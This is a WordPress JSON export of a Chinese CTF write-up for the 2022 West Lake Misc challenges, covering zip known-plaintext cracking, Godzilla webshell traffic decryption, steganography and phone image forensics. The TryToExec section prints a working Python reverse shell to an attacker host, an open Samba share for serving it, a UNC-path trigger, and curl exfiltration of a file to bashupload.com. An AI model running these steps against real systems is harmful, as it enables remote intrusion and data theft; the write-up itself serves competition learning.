{"id":126,"date":"2023-02-02T22:24:31","date_gmt":"2023-02-02T14:24:31","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=126"},"modified":"2023-02-03T18:02:02","modified_gmt":"2023-02-03T10:02:02","slug":"%e8%a5%bf%e6%b9%96%e8%ae%ba%e5%89%912022-misc-wp","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/126","title":{"rendered":"\u897f\u6e56\u8bba\u52512022 Misc WP"},"content":{"rendered":"

Misc<\/h2>\n

\u7b7e\u5230\u9898\u55b5<\/h3>\n

winhex\u6253\u5f00\u641c\u7d22JPG\u56fe\u7247\u5c3eFFD9\uff0c\u53d1\u73b0\u56fe\u7247\u5c3e\u90e8\u4e00\u6bb5\u8bdd\uff0c\u7167\u505a\u5c31\u884c<\/p>\n

\"\"<\/p>\n

\"\"<\/p>\n

take_the_zip_easy<\/h3>\n

\u4e00\u773c\u4e01\u771f\uff0c\u91cc\u9762\u7684zip\u540d\u5b57\u53ebdasflow.zip\uff0c\u731c\u6d4b\u91cc\u9762\u7684\u4e5f\u662fdasflow.pcapng\uff0c\u76f4\u63a5\u7528bkcrack\u8fdb\u884c\u5df2\u77e5\u660e\u6587\u653b\u51fb\uff0c1.txt\u7684\u5185\u5bb9\u4e3adasflow.pcapng<\/p>\n

.\/bkcrack.exe -C zipeasy.zip -c dasflow.zip -p 1.txt -o 30 -x 0 504B0304 >1.log<\/code><\/pre>\n
\u6210\u529f\u5f97\u5230\u5bc6\u94a5<\/p>\n
\"\"<\/p>\n
\u4f7f\u7528\u5bc6\u94a5\u5373\u53ef\u5f97\u5230dasflow.zip<\/p>\n
.\/bkcrack.exe -C zipeasy.zip -c dasflow.zip -k 2b7d78f3 0ebcabad a069728c -d dasflow.zip<\/code><\/pre>\n
\u6d41\u91cf\u6253\u5f00\u4e00\u770b\uff0c\u6839\u636e\u7279\u5f81\u5224\u65ad\u662f\u54e5\u65af\u62c9\u6d41\u91cf\uff0c\u800c\u4e14\u5bfc\u51fahttp\u53ef\u4ee5\u53d1\u73b0\u4e00\u4e2a\u88ab\u52a0\u5bc6\u7684flag\u538b\u7f29\u5305\uff0c\u627e\u5230\u89e3\u5bc6\u6240\u9700\u7684\u4e1c\u897f\u540e\u5c31\u53ef\u4ee5\u7528\u811a\u672c\u89e3\u5bc6<\/p>\n
\"\"<\/p>\n
<?php\nfunction encode($D,$K){\n    for($i=0;$i<strlen($D);$i++){\n        $c = $K[$i+1&15];\n        $D[$i] = $D[$i]^$c;\n    }\n    return $D;\n}\n\n$pass='air123';\n$payloadName='payload';\n$key='d8ea7326e6ec5916';\n\necho gzdecode(encode(base64_decode('xxx'),$key));<\/code><\/pre>\n
\u5355\u72ec\u770bhttp\u6d41\uff0c\u731c\u6d4b\u4e0a\u4f20flag.zip\u7684\u524d\u4e00\u6b65\u662f\u751f\u6210zip\u6587\u4ef6\uff0c\u6240\u4ee5\u76f4\u63a5\u89e3\u5bc6\u4e0a\u4f20\u7684\u524d\u4e00\u6bb5\u6d41\u91cf\u91cc\u7684\u52a0\u5bc6\u6570\u636e\uff0c\u5f97\u5230\u5bc6\u7801<\/p>\n
\u52a0\u5bc6\u540e\u7684\u751f\u6210zip\u547d\u4ee4\uff1aJ+5pNzMyNmU2mij7dMD\/qHMAa1dTUh6rZrUuY2l7eDVot058H+AZShmyrB3w\/OdLFa2oeH\/jYdeYr09l6fxhLPMsLeAwg8MkGmC+Nbz1+kYvogF0EFH1p\/KFEzIcNBVfDaa946G+ynGJob9hH1+WlZFwyP79y4\/cvxxKNVw8xP1OZWE3\n\n\u89e3\u5bc6\u540e\uff1acmdLinePsh -c "cd "\/var\/www\/html\/upload\/";zip -o flag.zip \/flag -P airDAS1231qaSW@" 2>&1methodName execCommand<\/code><\/pre>\n
\u5f97\u5230\u5bc6\u7801airDAS1231qaSW@\uff0c\u89e3\u5f00\u538b\u7f29\u5305\u62ff\u5230flag<\/p>\n
DASCTF{7892a81d23580e4f3073494db431afc5}<\/code><\/pre>\n
mp3<\/h3>\n
\u4e00\u773c\u4e01\u771f\uff0c\u5c3e\u90e8\u4e00\u4e2apng\uff0c\u63d0\u53d6\u4e00\u4e0b\uff0c\u662f\u4e00\u5f20\u53ea\u6709\u9ed1\u767d\u7684\u56fe\u7247\uff0czsteg\u8dd1\u4e00\u624b<\/p>\n
\"\"<\/p>\n
\u597d\u5bb6\u4f19\uff0c\u8fd8\u6709\u4e2a\u538b\u7f29\u5305\uff0c\u76f4\u63a5\u63d0\u51fa\u6765<\/p>\n
zsteg -E 'b1,r,lsb,xy' 00000646.png > 1.zip<\/code><\/pre>\n
\u662f\u4e2a\u635f\u574f\u7684\u52a0\u5bc6\u538b\u7f29\u5305\uff0cwinrar\u76f4\u63a5\u53ef\u4ee5\u4fee\u597d\uff0c\u4e8e\u662f\u770b\u770bMP3<\/p>\n
\u731c\u6d4b\u662fMP3stego\uff0c\u8bd5\u4e86\u8bd5\u53d1\u73b0\u662f\u7a7a\u5bc6\u7801<\/p>\n
\"\"<\/p>\n
\u5f97\u5230\u538b\u7f29\u5305\u5bc6\u7801\uff1a8750d5109208213f<\/p>\n
\u6839\u636e\u6587\u4ef6\u540d\uff0c\u731c\u4e00\u624brot47\uff0c\u5f97\u5230\u7684\u4e1c\u897f\u6709\u70b9\u50cfjs\uff0c\u76f4\u63a5\u5728\u63a7\u5236\u53f0\u91cc\u8dd1\u4e00\u4e0b<\/p>\n
\"\"<\/p>\n
DASCTF{f8097257d699d7fdba7e97a15c4f94b4}<\/code><\/pre>\n
\u673a\u4f60\u592a\u7f8e<\/h3>\n
\u62ff\u7740\u65b0\u9644\u4ef6\u76f4\u63a5\u6253\u5f00\u591c\u795e\u6a21\u62df\u5668\u5bfc\u5165\uff0c\u673a\u5b50\u8d77\u8d77\u6765\u4e4b\u540e\u53d1\u73b0\u6709PIN\u5bc6\u7801\uff0c\u4e8e\u662f\u5728\u7f51\u4e0a\u627e\u4e86\u7bc7\u6587\u7ae0http:\/\/www.360doc.com\/content\/12\/0121\/07\/37846289_1012985425.shtml\uff0c\u7167\u7740\u505a\u5373\u53ef\u6d88\u9664PIN\u5bc6\u7801\u76f4\u63a5\u8fdb\u7cfb\u7edf<\/p>\n
\u522b\u7684\u6ca1\u627e\u5230\u5f88\u91cd\u8981\u7684\uff0c\u53ea\u6709\u684c\u9762\u4e0a\u53ebSkred\u7684\u8f6f\u4ef6\u91cc\u6709\u4e0d\u5c11\u5bf9\u8bdd\uff0c\u5728\u91cc\u9762\u53d1\u9001\u7684\u5341\u51e0\u4e2a\u538b\u7f29\u5305\u4ee5\u53ca\u4e24\u5f20\u56fe\u90fd\u53ef\u4ee5\u7528\u53d6\u8bc1\u5927\u5e08\u5728vmdk\u91cc\u627e\u5230<\/p>\n
\"\"<\/p>\n
\"\"<\/p>\n
\"\"<\/p>\n
\u91cd\u70b9\u5728\u8fd9\u4e24\u5f20\u56fe\u4e0a\uff0cjpg\u4e00\u773c\u4e01\u771f\uff0cexif\u91cc\u63d0\u793a\u4e86\u4e00\u4e2aXOR DASCTF<\/p>\n
\"\"<\/p>\n
\u8fd9\u4e2a\u6682\u65f6\u6ca1\u6709\u7528\uff0c\u6700\u540e\u624d\u6709\u7528\uff0c\u7136\u540e\u662fpng\uff0c\u7ec6\u5fc3\u4e00\u70b9\u7684\u8bdd\u53ef\u4ee5\u5728alph\u901a\u9053\u91cc\u53d1\u73b0\u4e00\u6761\u7ebf<\/p>\n
\"\"<\/p>\n
\u7b80\u5355\u63d0\u53d6\u4e0b\u50cf\u7d20<\/p>\n
from PIL import Image\nwidth = 1532\nheight = 961\nimg=Image.open("41.png")\nfor i in range(width):\n    for j in range(height):\n        pi=img.getpixel((i,j))\n        if(pi[3] == 255):\n            print(1,end='')\n        else:\n            print(0,end='')<\/code><\/pre>\n
\u518d\u5c06\u5f97\u5230\u7684\u8f93\u51fa\u624b\u52a8\u53bb\u5934\u53bb\u5c3e\uff0c\u5373\u53ef\u5f97\u5230\u538b\u7f29\u5305\u5bc6\u7801e01544a9333ef62a3aa27357eb52ea8a<\/p>\n
\"\"<\/p>\n
\u4e0a\u9762\u7684\u538b\u7f29\u5305\u968f\u4fbf\u63d0\u53d6\u4e86\u4e00\u4e2a\uff0c\u53ef\u4ee5\u6210\u529f\u89e3\u5bc6\uff0c\u53d1\u73b0\u91cc\u9762\u662f\u4e71\u7801\uff0c\u4e8e\u662fxor DASCTF2022\u5373\u53ef\u5f97\u5230flag<\/p>\n
\"\"<\/p>\n
DASCTF{fe089fecf73daa9dcba9bc385df54605}<\/code><\/pre>\n
TryToExec<\/h3>\n
    \n
  1. \u751f\u6210exe\u9a6c<\/li>\n<\/ol>\n
    import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('xxx.xxx.xxx.xx',3333));threading.Thread(target=exec,args=("while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)",globals()),daemon=True).start();threading.Thread(target=exec,args=("while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)",globals())).start()<\/code><\/pre>\n
    pyinstaller --onefile test.py \u7f16\u8bd1\u6210exe<\/p>\n
      \n
    1. \n
      vps\u5b89\u88c5samba\u5171\u4eab\u9a6c<\/p>\n
      sudo yum install samba samba-client\nsudo systemctl start smb.service\nfirewall-cmd --permanent --zone=public --add-service=samba\nsudo nano \/etc\/samba\/smb.conf<\/code><\/pre>\n<\/li>\n<\/ol>\n
      [global] \u4e0b\u9762\u6dfb\u52a0\u8fd9\u4e2a\nacl allow execute always = True\n\n\u6587\u4ef6\u5c3e\u90e8\u52a0\u8fd9\u4e2a\n[public]\npath = \/tmp\/a\navailable = yes\nread only = no\nbrowsable = yes\npublic = yes\nwritable = yes\nguest ok = yes<\/code><\/pre>\n
      sudo systemctl restart smb.service<\/code><\/pre>\n
        \n
      1. \n
        \u7b2c\u4e00\u6b65\u7f16\u8bd1\u7684\u9a6c \u653e\u5230\/tmp\/a\/\u4e0b\u9762 chmod 777<\/p>\n<\/li>\n
      2. \n
        \u53cd\u5f39shell<\/p>\n
        GET http:\/\/162.14.110.33:15000\/api?action=%5C%5Cxxx.xxx.xxx.xx%5Cpublic%5C99.exe<\/a> <\/p>\n<\/li>\n
      3. \n
        curl bashupload.com -T ..\\Th3Th1nsUW4nt.docx
        \n\"\"<\/p>\n<\/li>\n<\/ol>\n
        \"\"<\/p>\n
        DASCTF{d551c29f6c77a97ecf30fe7a6afda6ce}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
        Misc \u7b7e\u5230\u9898\u55b5 winhex\u6253\u5f00\u641c\u7d22JPG\u56fe\u7247\u5c3eFFD9\uff0c\u53d1\u73b0\u56fe\u7247\u5c3e\u90e8\u4e00\u6bb5\u8bdd\uff0c\u7167\u505a\u5c31\u884c take_the_zip_easy \u4e00\u773c\u4e01\u771f\uff0c\u91cc\u9762\u7684zip\u540d\u5b57\u53ebdasflow.zip\uff0c\u731c\u6d4b\u91cc\u9762\u7684\u4e5f\u662fdasflow.pcapng\uff0c\u76f4\u63a5\u7528bkcrack\u8fdb\u884c\u5df2\u77e5\u660e\u6587\u653b\u51fb\uff0c1.txt\u7684\u5185\u5bb9\u4e3adasflow.pcapng .\/bkcrack.exe -C zipeasy.zip -c dasflow.zip – […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-126","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=126"}],"version-history":[{"count":3,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/126\/revisions"}],"predecessor-version":[{"id":129,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/126\/revisions\/129"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}